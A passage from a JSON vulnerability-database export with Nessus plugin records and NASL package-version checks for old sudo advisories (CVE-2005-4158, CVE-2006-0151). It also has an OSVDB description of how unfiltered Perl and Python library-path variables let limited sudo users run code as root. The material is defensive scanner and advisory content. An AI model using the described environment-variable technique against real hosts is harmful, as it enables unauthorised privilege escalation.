default Ubuntu installation,\nor any setup that just grants full root privileges to certain users.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2006-01-21T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : sudo vulnerability (USN-235-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4158"], "modified": "2006-01-21T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:4.10", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:sudo"], "id": "UBUNTU_USN-235-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20779", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-235-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20779);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-4158\");\n script_xref(name:\"USN\", value:\"235-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : sudo vulnerability (USN-235-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Charles Morris discovered a privilege escalation vulnerability in\nsudo. On executing Perl scripts with sudo, various environment\nvariables that affect Perl's library search path were not cleaned\nproperly. If sudo is set up to grant limited sudo execution of Perl\nscripts to normal users, this could be exploited to run arbitrary\ncommands as the target user.\n\nThis security update also filters out environment variables that can\nbe exploited similarly with Python, Ruby, and zsh scripts.\n\nPlease note that this does not affect the default Ubuntu installation,\nor any setup that just grants full root privileges to certain users.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2006-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"sudo\", pkgver:\"1.6.7p5-1ubuntu4.4\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"sudo\", pkgver:\"1.6.8p5-1ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"sudo\", pkgver:\"1.6.8p9-2ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:27:55", "description": "USN-235-1 fixed a vulnerability in sudo's handling of environment\nvariables. Tavis Ormandy noticed that sudo did not filter out the\nPYTHONINSPECT environment variable, so that users with the limited\nprivilege of calling a python script with sudo could still escalate\ntheir privileges.\n\nFor reference, this is the original advisory :\n\nCharles Morris discovered a privilege escalation vulnerability in\nsudo. On executing Perl scripts with sudo, various environment\nvariables that affect Perl's library search path were not cleaned\nproperly. If sudo is set up to grant limited sudo execution of Perl\nscripts to normal users, this could be exploited to run arbitrary\ncommands as the target user.\n\nThis security update also filters out environment variables\nthat can be exploited similarly with Python, Ruby, and zsh\nscripts.\n\nPlease note that this does not affect the default Ubuntu\ninstallation, or any setup that just grants full root\nprivileges to certain users.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2006-01-21T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : sudo vulnerability (USN-235-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-4158"], "modified": "2006-01-21T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:5.04", "cpe:/o:canonical:ubuntu_linux:4.10", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:sudo"], "id": "UBUNTU_USN-235-2.NASL", "href": "https://www.tenable.com/plugins/nessus/20780", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-235-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20780);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-4158\");\n script_xref(name:\"USN\", value:\"235-2\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : sudo vulnerability (USN-235-2)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-235-1 fixed a vulnerability in sudo's handling of environment\nvariables. Tavis Ormandy noticed that sudo did not filter out the\nPYTHONINSPECT environment variable, so that users with the limited\nprivilege of calling a python script with sudo could still escalate\ntheir privileges.\n\nFor reference, this is the original advisory :\n\nCharles Morris discovered a privilege escalation vulnerability in\nsudo. On executing Perl scripts with sudo, various environment\nvariables that affect Perl's library search path were not cleaned\nproperly. If sudo is set up to grant limited sudo execution of Perl\nscripts to normal users, this could be exploited to run arbitrary\ncommands as the target user.\n\nThis security update also filters out environment variables\nthat can be exploited similarly with Python, Ruby, and zsh\nscripts.\n\nPlease note that this does not affect the default Ubuntu\ninstallation, or any setup that just grants full root\nprivileges to certain users.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2006-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"sudo\", pkgver:\"1.6.7p5-1ubuntu4.5\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"sudo\", pkgver:\"1.6.8p5-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"sudo\", pkgver:\"1.6.8p9-2ubuntu2.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:30", "description": "Charles Morris discovered a vulnerability in sudo versions prior to\n1.6.8p12 where, when the perl taint flag is off, sudo does not clear\nthe PERLLIB, PERL5LIB, and PERL5OPT environment variables, which could\nallow limited local users to cause a perl script to include and\nexecute arbitrary library files that have the same name as library\nfiles that included by the script.\n\nIn addition, other environment variables have been included in the\npatch that remove similar environment variables that could be used in\npython and ruby, scripts, among others.\n\nThe updated packages have been patched to correct this problem.", "edition": 25, "published": "2006-01-15T00:00:00", "title": "Mandrake Linux Security Advisory : sudo (MDKSA-2005:234)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "modified": "2006-01-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:sudo", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "cpe:/o:mandriva:linux:2006", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005"], "id": "MANDRAKE_MDKSA-2005-234.NASL", "href": "https://www.tenable.com/plugins/nessus/20465", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:234. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20465);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_xref(name:\"MDKSA\", value:\"2005:234\");\n\n script_name(english:\"Mandrake Linux Security Advisory : sudo (MDKSA-2005:234)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Charles Morris discovered a vulnerability in sudo versions prior to\n1.6.8p12 where, when the perl taint flag is off, sudo does not clear\nthe PERLLIB, PERL5LIB, and PERL5OPT environment variables, which could\nallow limited local users to cause a perl script to include and\nexecute arbitrary library files that have the same name as library\nfiles that included by the script.\n\nIn addition, other environment variables have been included in the\npatch that remove similar environment variables that could be used in\npython and ruby, scripts, among others.\n\nThe updated packages have been patched to correct this problem.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.sudo.ws/sudo/alerts/perl_env.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", reference:\"sudo-1.6.8p1-1.4.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", reference:\"sudo-1.6.8p1-2.3.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", reference:\"sudo-1.6.8p8-2.2.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:36", "description": "Previous sudo updates were made available to sanitize certain\nenvironment variables from affecting a sudo call, such as\nPYTHONINSPECT, PERL5OPT, etc. While those updates were effective in\naddressing those specific environment variables, other variables that\nwere not blacklisted were being made available.\n\nDebian addressed this issue by forcing sudo to use a whitlist approach\nin DSA-946-2 by arbitrarily making env_reset the default (as opposed\nto having to be enabled in /etc/sudoers). Mandriva has opted to follow\nthe same approach so now only certain variables are, by default, made\navailable, such as HOME, LOGNAME, SHELL, TERM, DISPLAY, XAUTHORITY,\nXAUTHORIZATION, LANG, LANGUAGE, LC_*, and USER, as well as the SUDO_*\nvariables.\n\nIf other variables are required to be kept, this can be done by\nediting /etc/sudoers and using the env_keep option, such as :\n\nDefaults env_keep='FOO BAR'\n\nAs well, the Corporate 3 packages are now compiled with the\nSECURE_PATH setting.\n\nUpdated packages are patched to address this issue.", "edition": 25, "published": "2006-12-16T00:00:00", "title": "Mandrake Linux Security Advisory : sudo (MDKSA-2006:159)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "modified": "2006-12-16T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:sudo", "cpe:/o:mandriva:linux:2006"], "id": "MANDRAKE_MDKSA-2006-159.NASL", "href": "https://www.tenable.com/plugins/nessus/23903", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:159. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(23903);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_xref(name:\"DSA\", value:\"946\");\n script_xref(name:\"MDKSA\", value:\"2006:159\");\n\n script_name(english:\"Mandrake Linux Security Advisory : sudo (MDKSA-2006:159)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandrake Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Previous sudo updates were made available to sanitize certain\nenvironment variables from affecting a sudo call, such as\nPYTHONINSPECT, PERL5OPT, etc. While those updates were effective in\naddressing those specific environment variables, other variables that\nwere not blacklisted were being made available.\n\nDebian addressed this issue by forcing sudo to use a whitlist approach\nin DSA-946-2 by arbitrarily making env_reset the default (as opposed\nto having to be enabled in /etc/sudoers). Mandriva has opted to follow\nthe same approach so now only certain variables are, by default, made\navailable, such as HOME, LOGNAME, SHELL, TERM, DISPLAY, XAUTHORITY,\nXAUTHORIZATION, LANG, LANGUAGE, LC_*, and USER, as well as the SUDO_*\nvariables.\n\nIf other variables are required to be kept, this can be done by\nediting /etc/sudoers and using the env_keep option, such as :\n\nDefaults env_keep='FOO BAR'\n\nAs well, the Corporate 3 packages are now compiled with the\nSECURE_PATH setting.\n\nUpdated packages are patched to address this issue.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2006.0\", reference:\"sudo-1.6.8p8-2.3.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:03:46", "description": "The former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this update.\n\nThe configuration option 'env_reset' is now activated by default. It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text :\n\n It has been discovered that sudo, a privileged program, that\n provides limited super user privileges to specific users, passes\n several environment variables to the program that runs with elevated\n privileges. In the case of include paths (e.g. for Perl, Python,\n Ruby or other scripting languages) this can cause arbitrary code to\n be executed as privileged user if the attacker points to a\n manipulated version of a system library.\n\n This update alters the former behaviour of sudo and limits the\n number of supported environment variables to LC_*, LANG, LANGUAGE\n and TERM. Additional variables are only passed through when set as\n env_check in /etc/sudoers, which might be required for some scripts\n to continue to work.", "edition": 26, "published": "2006-10-14T00:00:00", "title": "Debian DSA-946-2 : sudo - missing input sanitising", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:sudo"], "id": "DEBIAN_DSA-946.NASL", "href": "https://www.tenable.com/plugins/nessus/22812", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-946. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22812);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-4158\", \"CVE-2006-0151\");\n script_bugtraq_id(16184);\n script_xref(name:\"DSA\", value:\"946\");\n\n script_name(english:\"Debian DSA-946-2 : sudo - missing input sanitising\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The former correction to vulnerabilities in the sudo package worked\nfine but were too strict for some environments. Therefore we have\nreviewed the changes again and allowed some environment variables to\ngo back into the privileged execution environment. Hence, this update.\n\nThe configuration option 'env_reset' is now activated by default. It\nwill preserve only the environment variables HOME, LOGNAME, PATH,\nSHELL, TERM, DISPLAY, XAUTHORITY, XAUTHORIZATION, LANG, LANGUAGE,\nLC_*, and USER in addition to the separate SUDO_* variables.\n\nFor completeness please find below the original advisory text :\n\n It has been discovered that sudo, a privileged program, that\n provides limited super user privileges to specific users, passes\n several environment variables to the program that runs with elevated\n privileges. In the case of include paths (e.g. for Perl, Python,\n Ruby or other scripting languages) this can cause arbitrary code to\n be executed as privileged user if the attacker points to a\n manipulated version of a system library.\n\n This update alters the former behaviour of sudo and limits the\n number of supported environment variables to LC_*, LANG, LANGUAGE\n and TERM. Additional variables are only passed through when set as\n env_check in /etc/sudoers, which might be required for some scripts\n to continue to work.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=342948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-946\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the sudo package. For unstable 'Defaults = env_reset' need to\nbe added to /etc/sudoers manually.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.6.6-1.6.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.8p7-1.4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"sudo\", reference:\"1.6.6-1.6\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"sudo\", reference:\"1.6.8p7-1.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2006-0151", "CVE-2005-4158"], "edition": 1, "description": "## Vulnerability Description\nSudo contain a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a user is able to run perl scripts via Sudo, and the perl scripts to not have the taint flag (-T). This flaw may lead to a loss of integrity.\n## Technical Description\nAn attacker may set the PERLLIB, PERL5LIB, and PERL5OPT environment variables to arbitrary paths, and sudo does not filter them and passes them directly to perl. This results in perl looking at these paths for libraries when running a \"use()\", \"require()\", or \"do()\". This issue is very similar to LD_LIBRARY_PATH attacks.\n## Solution Description\nUpgrade to version 1.6.8p12 or higher, as it has been reported to fix this vulnerability. An administrator can also apply the following workaround: Add\n'Defaults\tenv_delete+=\"PERLLIB PERL5LIB PERL5OPT\"' to\nthe top of the sudoers file to strip out the offending variables.\n## Short Description\nSudo incorrect environment variable filtering (PERLLIB, PERL5LIB, PERL5OPT)\n## References:\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0010/)\n[Vendor Specific Advisory URL](http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.421822)\nSecurity Tracker: 1015192\n[Secunia Advisory ID:19016](https://secuniaresearch.flexerasoftware.com/advisories/19016/)\n[Secunia Advisory ID:17534](https://secuniaresearch.flexerasoftware.com/advisories/17534/)\n[Secunia 